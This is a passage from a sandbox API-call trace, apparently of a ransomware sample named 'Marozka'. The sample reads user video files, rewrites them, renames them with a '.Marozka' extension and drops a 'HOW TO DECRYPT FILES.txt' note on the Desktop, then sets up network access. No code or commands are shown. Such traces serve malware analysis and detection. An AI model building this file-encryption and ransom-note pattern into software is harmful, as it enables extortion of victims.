lpFindFileData=0x5be740) returned 1 [0059.704] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0059.704] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0059.704] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0059.705] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 0 [0059.705] FindClose (in: hFindFile=0xa7d988 | out: hFindFile=0xa7d988) returned 1 [0059.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9c8) returned 1 [0059.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9d4) returned 1 [0059.705] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\mR0Uno3NlxTV.avi", nBufferLength=0x105, lpBuffer=0x5be374, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\mR0Uno3NlxTV.avi", lpFilePart=0x0) returned 0x57 [0059.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8b8) returned 1 [0059.705] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\mR0Uno3NlxTV.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\jdf-kblkorurpayi0jl\\mr0uno3nlxtv.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0059.705] GetFileType (hFile=0x2e0) returned 0x1 [0059.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8b4) returned 1 [0059.705] GetFileType (hFile=0x2e0) returned 0x1 [0059.705] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5be9b4 | out: lpFileSizeHigh=0x5be9b4*=0x0) returned 0x15b4f [0059.705] ReadFile (in: hFile=0x2e0, lpBuffer=0x36c9d58, nNumberOfBytesToRead=0x15b4f, lpNumberOfBytesRead=0x5be960, lpOverlapped=0x0 | out: lpBuffer=0x36c9d58*, lpNumberOfBytesRead=0x5be960*=0x15b4f, lpOverlapped=0x0) returned 1 [0059.706] CloseHandle (hObject=0x2e0) returned 1 [0059.725] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0059.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0059.725] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5be9a8 | out: lpFileInformation=0x5be9a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0059.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0059.725] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\mR0Uno3NlxTV.avi", nBufferLength=0x105, lpBuffer=0x5be360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\mR0Uno3NlxTV.avi", lpFilePart=0x0) returned 0x57 [0059.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8a4) returned 1 [0059.725] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\mR0Uno3NlxTV.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\jdf-kblkorurpayi0jl\\mr0uno3nlxtv.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0059.726] GetFileType (hFile=0x2e0) returned 0x1 [0059.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8a0) returned 1 [0059.726] GetFileType (hFile=0x2e0) returned 0x1 [0059.726] WriteFile (in: hFile=0x2e0, lpBuffer=0x3736628*, nNumberOfBytesToWrite=0x15b50, lpNumberOfBytesWritten=0x5be954, lpOverlapped=0x0 | out: lpBuffer=0x3736628*, lpNumberOfBytesWritten=0x5be954*=0x15b50, lpOverlapped=0x0) returned 1 [0059.729] CloseHandle (hObject=0x2e0) returned 1 [0059.731] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\mR0Uno3NlxTV.avi", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\mR0Uno3NlxTV.avi", lpFilePart=0x0) returned 0x57 [0059.731] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\mR0Uno3NlxTV.avi.Marozka", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\mR0Uno3NlxTV.avi.Marozka", lpFilePart=0x0) returned 0x5f [0059.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be938) returned 1 [0059.731] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\mR0Uno3NlxTV.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\jdf-kblkorurpayi0jl\\mr0uno3nlxtv.avi"), fInfoLevelId=0x0, lpFileInformation=0x5be9b4 | out: lpFileInformation=0x5be9b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5ea3b00, ftCreationTime.dwHighDateTime=0x1d4d440, ftLastAccessTime.dwLowDateTime=0x8b463310, ftLastAccessTime.dwHighDateTime=0x1d4cc84, ftLastWriteTime.dwLowDateTime=0xe654a7dd, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x15b50)) returned 1 [0059.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be934) returned 1 [0059.731] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\mR0Uno3NlxTV.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\jdf-kblkorurpayi0jl\\mr0uno3nlxtv.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\mR0Uno3NlxTV.avi.Marozka" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\jdf-kblkorurpayi0jl\\mr0uno3nlxtv.avi.marozka")) returned 1 [0059.731] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\x_xew8.mkv", nBufferLength=0x105, lpBuffer=0x5be374, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\x_xew8.mkv", lpFilePart=0x0) returned 0x51 [0059.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8b8) returned 1 [0059.731] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\x_xew8.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\jdf-kblkorurpayi0jl\\x_xew8.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0059.732] GetFileType (hFile=0x2e0) returned 0x1 [0059.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8b4) returned 1 [0059.732] GetFileType (hFile=0x2e0) returned 0x1 [0059.732] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5be9b4 | out: lpFileSizeHigh=0x5be9b4*=0x0) returned 0x14be9 [0059.732] ReadFile (in: hFile=0x2e0, lpBuffer=0x275a588, nNumberOfBytesToRead=0x14be9, lpNumberOfBytesRead=0x5be960, lpOverlapped=0x0 | out: lpBuffer=0x275a588*, lpNumberOfBytesRead=0x5be960*=0x14be9, lpOverlapped=0x0) returned 1 [0059.732] CloseHandle (hObject=0x2e0) returned 1 [0059.815] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0059.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0059.815] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5be9a8 | out: lpFileInformation=0x5be9a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0059.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0059.815] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\x_xew8.mkv", nBufferLength=0x105, lpBuffer=0x5be360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\x_xew8.mkv", lpFilePart=0x0) returned 0x51 [0059.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8a4) returned 1 [0059.815] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\x_xew8.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\jdf-kblkorurpayi0jl\\x_xew8.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0059.817] GetFileType (hFile=0x2e0) returned 0x1 [0059.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8a0) returned 1 [0059.817] GetFileType (hFile=0x2e0) returned 0x1 [0059.817] WriteFile (in: hFile=0x2e0, lpBuffer=0x27e5758*, nNumberOfBytesToWrite=0x14bf0, lpNumberOfBytesWritten=0x5be954, lpOverlapped=0x0 | out: lpBuffer=0x27e5758*, lpNumberOfBytesWritten=0x5be954*=0x14bf0, lpOverlapped=0x0) returned 1 [0059.819] CloseHandle (hObject=0x2e0) returned 1 [0059.940] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\x_xew8.mkv", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\x_xew8.mkv", lpFilePart=0x0) returned 0x51 [0059.941] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\x_xew8.mkv.Marozka", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\x_xew8.mkv.Marozka", lpFilePart=0x0) returned 0x59 [0059.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be938) returned 1 [0059.941] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\x_xew8.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\jdf-kblkorurpayi0jl\\x_xew8.mkv"), fInfoLevelId=0x0, lpFileInformation=0x5be9b4 | out: lpFileInformation=0x5be9b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb49f8dd0, ftCreationTime.dwHighDateTime=0x1d4c755, ftLastAccessTime.dwLowDateTime=0x7279700, ftLastAccessTime.dwHighDateTime=0x1d4d4f8, ftLastWriteTime.dwLowDateTime=0xe676091b, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x14bf0)) returned 1 [0059.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be934) returned 1 [0059.941] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\x_xew8.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\jdf-kblkorurpayi0jl\\x_xew8.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\x_xew8.mkv.Marozka" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\jdf-kblkorurpayi0jl\\x_xew8.mkv.marozka")) returned 1 [0059.949] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x5be600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x30 [0059.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb44) returned 1 [0059.949] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e0 [0059.968] GetFileType (hFile=0x2e0) returned 0x1 [0059.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb40) returned 1 [0059.968] GetFileType (hFile=0x2e0) returned 0x1 [0059.971] WriteFile (in: hFile=0x2e0, lpBuffer=0x27fd260*, nNumberOfBytesToWrite=0x393, lpNumberOfBytesWritten=0x5beba4, lpOverlapped=0x0 | out: lpBuffer=0x27fd260*, lpNumberOfBytesWritten=0x5beba4*=0x393, lpOverlapped=0x0) returned 1 [0059.972] CloseHandle (hObject=0x2e0) returned 1 [0060.088] GetCurrentProcess () returned 0xffffffff [0060.088] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5be85c | out: TokenHandle=0x5be85c*=0x2e4) returned 1 [0060.103] GetCurrentProcess () returned 0xffffffff [0060.103] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5be86c | out: TokenHandle=0x5be86c*=0x2d0) returned 1 [0060.163] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2d4 [0060.163] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2e8 [0060.166] GetCurrentProcess () returned 0xffffffff [0060.166] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5be87c | out: TokenHandle=0x5be87c*=0x2d8) returned 1 [0060.169] GetCurrentProcess () returned 0xffffffff [0060.169] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5be88c | out: TokenHandle=0x5be88c*=0x2dc) returned 1 [0060.174] QueryPerformanceFrequency (in: lpFrequency=0x885a98 | out: lpFrequency=0x885a98*=100000000) returned 1 [0060.174] QueryPerformanceCounter (in: lpPerformanceCount=0x5bec00 | out: lpPerformanceCount=0x5bec00*=15163634959) returned 1 [0060.178] GetCurrentProcess () returned 0xffffffff [0060.178] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5be848 | out: TokenHandle=0x5be848*=0x2cc) returned 1 [0060.182] GetCurrentProcess () returned 0xffffffff [0060.182] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5be858 | out: TokenHandle=0x5be858*=0x3fc) returned 1 [0060.198] GetCurrentProcess () returned 0xffffffff [0060.198] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5be85c | out: TokenHandle=0x5be85c*=0x410) returned 1 [0060.200] GetCurrentProcess () returned 0xffffffff [0060.200] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5be86c | out: TokenHandle=0x5be86c*=0x414) returned 1 [0060.248] GetCurrentProcess () returned 0xffffffff [0060.248] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5beae4 | out: TokenHandle=0x5beae4*=0x418) returned 1 [0060.254] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x5bdc1c | out: phkResult=0x5bdc1c*=0x41c) returned 0x0 [0060.255] RegQueryValueExW (in: hKey=0x41c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5bdc3c, lpData=0x0, lpcbData=0x5bdc38*=0x0 | out: lpType=0x5bdc3c*=0x1, lpData=0x0, lpcbData=0x5bdc38*=0xe) returned 0x0 [0060.256] RegQueryValueExW (in: hKey=0x41c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5bdc3c, lpData=0x28083a0, lpcbData=0x5bdc38*=0xe | out: lpType=0x5bdc3c*=0x1, lpData="Client", lpcbData=0x5bdc38*=0xe) returned 0x0 [0060.256] RegCloseKey (hKey=0x41c) returned 0x0 [0060.827] CoTaskMemAlloc (cb=0xcc0) returned 0xafced8 [0060.828] RasEnumConnectionsW (in: param_1=0xafced8, param_2=0x5beaf4, param_3=0x5beaf8 | out: param_1=0xafced8, param_2=0x5beaf4, param_3=0x5beaf8) returned 0x0 [0061.074] CoTaskMemFree (pv=0xafced8) [0061.446] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x5be8e0 | out: lpWSAData=0x5be8e0) returned 0 [0061.451] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x480 [0061.955] setsockopt (s=0x480, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0061.955] closesocket (s=0x480) returned 0 [0061.955] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x480 [0061.961] setsockopt (s=0x480, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0061.961] closesocket (s=0x480) returned 0 [0061.962] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x480 [0061.962] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x484 [0061.963] ioctlsocket (in: s=0x480, cmd=-2147195266, argp=0x5beafc | out: argp=0x5beafc) returned 0 [0061.964] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x488 [0061.964] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x48c [0061.964] ioctlsocket (in: s=0x488, cmd=-2147195266, argp=0x5beafc | out: argp=0x5beafc) returned 0 [0061.965] WSAIoctl (in: s=0x480, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5beae4, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5beae4, lpOverlapped=0x0) returned -1 [0061.967] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x5be814, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0062.044] WSAEventSelect (s=0x480, hEventObject=0x484, lNetworkEvents=512) returned 0 [0062.045] WSAIoctl (in: s=0x488, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5beae4, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5beae4, lpOverlapped=0x0) returned -1 [0062.045] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x5be814, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0062.045] WSAEventSelect (s=0x488, hEventObject=0x48c, lNetworkEvents=512) returned 0 [0062.045] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x494 [0062.045] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x494, param_3=0x3) returned 0x0 [0062.055] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x5beb10 | out: phkResult=0x5beb10*=0x4ac) returned 0x0 [0062.055] RegOpenKeyExW (in: hKey=0x4ac, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x5beac4 | out: phkResult=0x5beac4*=0x4b0) returned 0x0 [0062.056] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b4 [0062.056] RegNotifyChangeKeyValue (hKey=0x4b0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4b4, fAsynchronous=1) returned 0x0 [0062.057] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x5beac8 | out: phkResult=0x5beac8*=0x4b8) returned 0x0 [0062.058] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4bc [0062.058] RegNotifyChangeKeyValue (hKey=0x4b8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4bc, fAsynchronous=1) returned 0x0 [0062.058] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x5beac8 | out: phkResult=0x5beac8*=0x4c0) returned 0x0 [0062.059] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4c4 [0062.059] RegNotifyChangeKeyValue (hKey=0x4c0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4c4, fAsynchronous=1) returned 0x0 [0062.059] GetCurrentProcess () returned 0xffffffff [0062.059] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5beab4 | out: TokenHandle=0x5beab4*=0x4c8) returned 1 [0062.063] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x5be3c0 | out: phkResult=0x5be3c0*=0x4cc) returned 0x0 [0062.124] RegQueryValueExW (in: hKey=0x4cc, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x5be3dc, lpData=0x0, lpcbData=0x5be3d8*=0x0 | out: lpType=0x5be3dc*=0x0, lpData=0x0, lpcbData=0x5be3d8*=0x0) returned 0x2 [0062.124] RegCloseKey (hKey=0x4cc) returned 0x0 [0062.649] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xb055e8 [0063.100] WinHttpSetTimeouts (hInternet=0xb055e8, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0063.100] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x5beac4 | out: pProxyConfig=0x5beac4) returned 1 [0063.472] CoTaskMemAlloc (cb=0x20e) returned 0xa65690 [0063.472] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0xa65690, nSize=0x105 | out: lpBuffer="\x1ce8\x77d\x3788\xb0\x178e\x6f75\x177e\x6f75\x03") returned 0x0 [0063.472] CoTaskMemFree (pv=0xa65690) [0063.472] CoTaskMemAlloc (cb=0x20e) returned 0xa65690 [0063.472] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0xa65690, nSize=0x105 | out: lpBuffer="\x1ce8\x77d\x3788\xb0\x178e\x6f75\x177e\x6f75\x03") returned 0x0 [0063.472] CoTaskMemFree (pv=0xa65690) [0063.476] EtwEventRegister (in: ProviderId=0x280b138, EnableCallback=0x25e0636, CallbackContext=0x0, RegHandle=0x280b114 | out: RegHandle=0x280b114) returned 0x0 [0063.476] EtwEventSetInformation (RegHandle=0xaa2940, InformationClass=0x65, EventInformation=0x2, InformationLength=0x280b0d4) returned 0x0 [0063.478] GetCurrentProcess () returned 0xffffffff [0063.478] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5be824 | out: TokenHandle=0x5be824*=0x518) returned 1 [0063.479] GetCurrentProcess () returned 0xffffffff [0063.479] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5be834 | out: TokenHandle=0x5be834*=0x51c) returned 1 [0063.482] SetEvent (hEvent=0x2d4) returned 1 [0063.493] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5bea2c*=0x494, lpdwindex=0x5be84c | out: lpdwindex=0x5be84c) returned 0x80010115 [0063.552] PostMessageW (hWnd=0x60044, Msg=0x201a, wParam=0x0, lParam=0xa65210) returned 1 [0063.553] NtdllDefWindowProc_W (hWnd=0x60044, Msg=0x1a, wParam=0x0, lParam=0x4bd138) returned 0x0 [0063.576] BeginPaint (in: hWnd=0x70030, lpPaint=0x5be190 | out: lpPaint=0x5be190) returned 0x10105d6 [0063.576] GetWindowPlacement (in: hWnd=0x70030, lpwndpl=0x5bde6c | out: lpwndpl=0x5bde6c) returned 1 [0063.576] GetClientRect (in: hWnd=0x70030, lpRect=0x5bde18 | 